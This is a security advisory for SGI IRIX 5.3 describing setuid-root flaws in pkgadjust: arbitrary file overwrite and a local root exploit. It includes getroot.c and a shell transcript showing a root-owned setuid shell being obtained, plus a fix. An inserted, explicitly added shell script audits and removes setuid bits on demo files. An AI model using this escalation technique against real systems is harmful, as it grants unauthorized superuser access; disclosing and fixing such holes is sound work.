There are many major security holes in SGI's package installation system
for IRIX 5.3.  The code appears to have been written without proper
consideration of the implications of setuid.  Any user can gain superuser
access as well as overwrite (and thereby destroy) files.  The main program
that pkg{info,rm,etc} call is /usr/pkg/bin/pkgadjust, which is setuid root.

PROGRAM.   pkgadjust (from eoe2.sw.oampkg)
AFFECTS.   SGI IRIX 5.3.  IRIX 5.2 is not affected; unsure about IRIX 6.
REQUIRED.  Account on server
RISK.      superuser
AUTHOR.    Tung-Hui Hu

---

PROBLEM 1.

pkgadjust will allow any user to overwrite any file, because it allows one
to set via the command line:

    -o    write debugging output to the named file rather than to stderr

Since pkgadjust does not check ownership etc. of that file, this will
destroy the file, leading to a denial of service or removal of
authorization checks.

---

PROBLEM 2.

pkgadjust will allow any user to gain superuser access.  One can set the
programs it runs to list installed packages via the command line options:

    -a    normally the 'versions long' command line
    -b    normally the 'versions -v' command line

Because pkgadjust is setuid root, the substituted program runs as root.
This is trivially exploited:

    % cat > getroot.c
    int main()
    {
        setuid(0);
        chown("sh", 0, 0);
        chmod("sh", 04755);
        return 0;
    }
    % cc getroot.c -o getroot
    % cp /bin/sh sh
    % ls -la sh
    -rwxr-xr-x    1 hhui     user      140784 Jan  5 20:52 sh
    % /usr/pkg/bin/pkgadjust -f -a getroot
    scanning inst-database
    updating pkginfo-files
    ........................................^C
    % ls -la sh
    -rwsr-xr-x    1 root     sys       140784 Jan  5 20:52 sh
    % panic

---

FIX.

    # chmod 700 /usr/pkg/bin/pkgadjust

DISCUSSION.

No sermons here, but I really doubt the program was written for setuid.
Since most users can't write to the lockfile in /var/sadm, many pkg*
commands are unavailable to them in any case.
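The fix above is a single chmod, but an administrator usually wants to confirm which binaries still carry the setuid bit and that the bit is really gone afterwards.  The following is an added example, not code from the advisory or from SGI: a small POSIX sh audit/remediation helper built around the advisory's fix.  It assumes only POSIX find(1), chmod(1) and mktemp(1).  The files it scans are constructed in a temporary directory and merely mirror the modes the advisory reports (pkgadjust, and the abspath file listed further down); no real system binary is touched, and on a real host the candidate list would be the absolute paths from the advisory.

```shell
#!/bin/sh
# Added example, not part of the advisory: audit files for the setuid bit
# and apply the advisory's fix (chmod 700), verifying the bit is gone.
# Uses only POSIX find(1), chmod(1) and mktemp(1).  The scanned files are
# constructed below; they are stand-ins for the real IRIX binaries.

# Exit 0 if the file carries the setuid bit (regardless of owner), else 1.
# find -perm -4000 matches when all of the given mode bits are set.
is_setuid() {
    [ -n "$(find "$1" -prune -perm -4000 -print 2>/dev/null)" ]
}

# Print each argument that is setuid, one per line.
list_setuid() {
    for f in "$@"; do
        if is_setuid "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Print the number of setuid files among the arguments.
count_setuid() {
    list_setuid "$@" | wc -l | tr -d ' '
}

# The advisory's fix: drop setuid/setgid and make the file owner-only.
# Exit 0 only if the setuid bit is really gone afterwards.
fix_setuid() {
    chmod 700 "$1" && ! is_setuid "$1"
}

# --- demonstration on constructed files ------------------------------------
DEMO_DIR=$(mktemp -d)
: > "$DEMO_DIR/pkgadjust"; chmod 4755 "$DEMO_DIR/pkgadjust"   # -rwsr-xr-x, as on IRIX 5.3
: > "$DEMO_DIR/abspath";   chmod 4711 "$DEMO_DIR/abspath"     # -rws--x--x, from the advisory
: > "$DEMO_DIR/pkginfo";   chmod 755  "$DEMO_DIR/pkginfo"     # not setuid; nothing to do

# Constructed candidate list; on a real host use the absolute paths instead.
CANDIDATES="$DEMO_DIR/pkgadjust $DEMO_DIR/abspath $DEMO_DIR/pkginfo"

echo "setuid files before fix: $(count_setuid $CANDIDATES)"   # 2
list_setuid $CANDIDATES

fix_setuid "$DEMO_DIR/pkgadjust" && echo "fixed: $DEMO_DIR/pkgadjust"
echo "setuid files after fix:  $(count_setuid $CANDIDATES)"   # 1
```

Run it as an unprivileged user; setting the setuid bit on a file you own needs no root, so the demonstration is safe.  On a production host, replace CANDIDATES with the real paths and run fix_setuid as root, checking its exit status rather than trusting the chmod alone.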
I also found these files improperly permissioned and would recommend
removing setuid:

    -rwsr-xr-x    1 root     sys          838 Sep 27 11:27 /usr/lib/X11/app-defaults/ISDN
    -rws--x--x    1 root     sys        18632 Sep 27 10:59 /usr/pkg/bin/abspath

Tung-Hui Hu / '97 Comparative Literature / Princeton Universe
hhui@stardot.com / the STATIC: http://www.stardot.com/~hhui/static